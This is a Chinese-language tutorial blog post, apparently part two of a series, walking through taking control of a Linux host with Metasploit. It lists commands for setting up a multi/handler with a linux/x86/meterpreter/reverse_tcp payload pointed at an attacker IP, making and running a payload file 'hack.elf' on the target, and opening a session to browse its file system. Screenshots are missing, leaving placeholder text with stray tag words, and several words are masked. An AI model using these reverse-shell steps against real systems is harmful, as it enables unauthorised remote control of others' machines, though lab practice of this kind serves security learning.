網絡安全工程師演示:原來***是這樣控制你的服務器的!(下)

課前聲明:
一、本分享僅作學習交流,請自覺遵照法律法規!
二、搜索:Kali 與編程,學習更多網絡***乾貨!
三、Kali 與編程天天準時更新,敬請學習和關注!
正文部分
1、背景介紹
Metasploit就是一個漏洞框架。它的全稱叫作The Metasploit Framework,簡稱叫作MSF。Metasploit做爲全球最受歡迎的工具,不單單是由於它的方便性和強大性,更重要的是它的框架。它容許使用者開發本身的漏洞腳本,從而進行測試。Metasploit(msf)究竟威力如何呢?如何利用***控制受害者主機呢?接下來讓咱們一塊兒學習!
2、資源裝備
1.安裝好 Linux的虛擬機一臺
2.整裝待發的小白一個。
3.安裝好的Kali Linux虛擬機一臺。
3、戰略安排
3.1 啓動Metasploit(msf)***測試框架,以下圖所示。
命令1:msfconsole
在這裏插入圖片描述linux

步驟1:利用相應的漏洞利用模塊,以下圖所示。
命令2:use exploit/multi/handler
在這裏插入圖片描述編程

步驟2:查看漏洞模塊對應的參數,以下圖所示。
命令3:show options
在這裏插入圖片描述網絡

步驟3:設置對應的payload方便後續***,以下圖所示。
命令:set payload linux/x86/meterpreter/reverse_tcp
在這裏插入圖片描述框架

步驟4:查看該漏洞模塊的相關參數,以下圖所示。
命令:show options
在這裏插入圖片描述tcp

步驟5:設置對應的參數,以下圖所示。
命令:set lhost 193.168.78.169
在這裏插入圖片描述ide

步驟6:查看配置的參數是否成功,以下圖所示。
命令:show options
在這裏插入圖片描述工具

3.2 運行***文件,以下圖所示。
步驟1:給***文件賦予執行權限,以下圖所示。
命令:chmod +x hack.elf
在這裏插入圖片描述學習

步驟2:執行***文件,以下圖所示。
命令:./hack.elf
在這裏插入圖片描述測試

3.3 運行漏洞利用模塊,以下圖所示。
命令:run
以下圖所示,成功拿下目標主機。
在這裏插入圖片描述3d

查看目標主機的文件系統信息,以下圖所示。
在這裏插入圖片描述
小編一個個字敲打創做,可辛苦了,問君能否關注一下我呢?你還可搜索:Kali與編程,學習更多******技巧呢 !拒絕盜版,轉載請聲明來源:Kali與編程
點我學習更多Kali Linux***測試與網絡***實戰技巧!

相關文章
相關標籤/搜索